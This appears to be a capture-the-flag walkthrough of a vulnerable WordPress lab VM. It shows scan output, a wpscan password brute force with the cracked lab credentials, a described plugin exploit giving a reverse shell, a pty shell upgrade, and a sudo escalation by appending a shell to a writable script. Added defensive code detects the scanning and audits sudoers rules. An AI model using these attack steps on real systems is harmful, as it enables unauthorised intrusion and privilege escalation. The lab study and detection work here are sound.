Enumeration
nmap
nmap -sC -sV -oA nmap/DC6 192.168.1.115
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 07:20 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 07:20 (0:00:00 remaining)
Nmap scan report for wordy (192.168.1.115)
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:EC:F5:FF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds
After that, as usual, we put the IP into the address bar and see what we get.
We can see that the URL uses a domain called wordy.
Let's add an entry mapping the IP to wordy in /etc/hosts and reload the browser.
We get a WordPress site!
Dirb
dirb http://192.168.1.115
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 18 07:56:05 2020
URL_BASE: http://192.168.1.115/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.115/ ----
+ http://192.168.1.115/index.php (CODE:200|SIZE:53227)
+ http://192.168.1.115/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.1.115/wp-admin/
==> DIRECTORY: http://192.168.1.115/wp-content/
==> DIRECTORY: http://192.168.1.115/wp-includes/
+ http://192.168.1.115/xmlrpc.php (CODE:405|SIZE:42)
As we can see, we can navigate to /wp-admin, which redirects us to the login form.
After poking around I still couldn't find anything interesting.
wpscan
wpscan --url http://wordy --enumerate u
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wordy/ [192.168.1.115]
[+] Started: Mon May 18 08:00:12 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Mon May 18 08:00:15 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 172.594 MB
[+] Elapsed time: 00:00:03
We can see that there are 5 usernames available: admin, graham, mark, sarah and jens.
Let's put them inside a text file, then run wpscan with that list and a password list:
wpscan http://192.168.1.115/wp-login --usernames name.txt --passwords pass.txt
We get a valid username and password: mark and helpdesk01.
Let's log in to WordPress with them.
We've successfully logged in to the account.
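The wpscan run above leaves a distinctive trail in the web server's access log: a run of /?author=N probes, a hit on the wp/v2/users REST endpoint, and a burst of POSTs to wp-login.php. As an added example (not part of the original writeup), the Python below runs simple per-IP detection rules over constructed Apache combined-log lines; the client IP, the log lines and the thresholds are assumed.

```python
import re
from collections import defaultdict

# Apache combined log format; only the fields the rules need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)'
                    r' [^"]*" (?P<status>\d{3})')

def detect(lines, author_threshold=5, login_threshold=20):
    """Return (ip, rule, detail) alerts for the WordPress probing patterns wpscan leaves."""
    authors = defaultdict(set)     # ip -> distinct ?author=N ids probed
    rest_users = defaultdict(int)  # ip -> successful hits on wp/v2/users
    logins = defaultdict(int)      # ip -> POSTs to wp-login.php / xmlrpc.php
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.group("ip", "method", "path", "status")
        a = re.search(r"[?&]author=(\d+)", path)
        if a:
            authors[ip].add(int(a.group(1)))
        if "/wp-json/wp/v2/users" in path and status == "200":
            rest_users[ip] += 1
        if method == "POST" and path.split("?")[0].endswith(("/wp-login.php", "/xmlrpc.php")):
            logins[ip] += 1
    alerts = []
    for ip, ids in authors.items():
        if len(ids) >= author_threshold:
            alerts.append((ip, "author-id-enumeration", f"{len(ids)} distinct author ids"))
    for ip, n in rest_users.items():
        alerts.append((ip, "rest-users-listing", f"{n} request(s) to wp/v2/users"))
    for ip, n in logins.items():
        if n >= login_threshold:
            alerts.append((ip, "login-bruteforce", f"{n} POSTs to login endpoints"))
    return alerts

def sample_log():
    """Constructed Apache lines in the shape a wpscan run leaves; not taken from the box."""
    ts = "18/May/2020:08:00:12 -0400"
    ua = '"-" "WPScan v3.8.1"'
    lines = [f'192.168.1.50 - - [{ts}] "GET /index.php/feed/ HTTP/1.1" 200 2301 {ua}']
    lines += [f'192.168.1.50 - - [{ts}] "GET /?author={i} HTTP/1.1" 301 0 {ua}' for i in range(1, 11)]
    lines.append(f'192.168.1.50 - - [{ts}] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 1422 {ua}')
    lines += [f'192.168.1.50 - - [{ts}] "POST /wp-login.php HTTP/1.1" 200 3532 {ua}' for _ in range(25)]
    lines.append(f'192.168.1.20 - - [{ts}] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"')
    return lines
```

A single visitor hitting one author page (192.168.1.20 in the sample) stays below the thresholds, while the scanner's IP trips all three rules.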
Exploitation
Searchsploit
Since the Activity Monitor plugin is installed, I went to searchsploit to look for an exploit.
The exploit we want is the third one.
Copy the file to a directory that we can access later, then open it in nano.
We can see that a reverse shell will be called after we execute the file.
Change the URL from localhost to wordy, and the reverse shell address to your IP and the port you want to listen on.
First set up the listener on our machine, then open the file and click submit request.
Once we get a shell, type
python -c 'import pty; pty.spawn("/bin/bash")'
to get a proper shell.
Then navigate to /home/mark/stuff, where we find a file called things-to-do.txt.
Open it up and we see something inside: the graham user and his password, GSo7isUM1D4.
Let's log out and ssh in as graham.
Privilege Escalation
When we type sudo -l, we can see this:
It seems like we can run this as the jens user.
Append /bin/bash to the backups.sh file so that we get a shell when we switch to jens.
Then type
sudo -u jens /home/jens/backups.sh
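The weakness used here is a sudo rule whose target script can be modified by the user allowed to invoke it. As an added example (not from the writeup or the DC-6 box), the Python below parses sudoers-style rules and flags command paths that are not root-owned or are group/world-writable; the demo() scenario, its file names and the graham/jens rule text are constructed.

```python
import os
import re
import stat
import tempfile

# One sudoers user spec, e.g.  graham ALL=(jens) NOPASSWD: /home/jens/backups.sh
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                     r"(?:[A-Z]+:\s*)*(?P<cmds>.+)$")

def audit_command(path):
    """Findings for one command path: could a non-root user change what sudo runs?"""
    if path == "ALL":
        return ["rule allows ALL commands"]
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["command path does not exist"]
    checks = ((st.st_uid != 0, "not owned by root"),
              (st.st_mode & stat.S_IWGRP, "group-writable"),
              (st.st_mode & stat.S_IWOTH, "world-writable"))
    return [msg for bad, msg in checks if bad]

def audit_sudoers(text):
    """Map 'user -> (runas) command' to findings for every user rule in text."""
    report = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = RULE_RE.match(line)
        if not m or line.startswith("Defaults"):
            continue
        runas = m.group("runas") or "root"
        for cmd in m.group("cmds").split(","):
            path = cmd.strip().split()[0]
            report[f"{m.group('user')} -> ({runas}) {path}"] = audit_command(path)
    return report

def demo():
    """Constructed scenario: a group-writable backup script beside a sane one."""
    d = tempfile.mkdtemp()
    weak, safe = os.path.join(d, "backups.sh"), os.path.join(d, "rotate.sh")
    for p, mode in ((weak, 0o775), (safe, 0o755)):
        open(p, "w").close()
        os.chmod(p, mode)
    sudoers = (f"graham ALL=(jens) NOPASSWD: {weak}, {safe}\n"
               "%sudo ALL=(ALL:ALL) ALL\n")
    report = audit_sudoers(sudoers)
    return {"backups.sh": report[f"graham -> (jens) {weak}"],
            "rotate.sh": report[f"graham -> (jens) {safe}"],
            "sudo-group": report["%sudo -> (ALL:ALL) ALL"]}
```

Run against a real /etc/sudoers (plus /etc/sudoers.d/*) as root, every rule whose command is writable by anyone other than root is a candidate for exactly the append-a-shell trick used above.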
We successfully become the jens user. Type sudo -l again and we get this:
Follow the instructions given.
We got root!
Navigate to /root to get the flag.
Congratulations!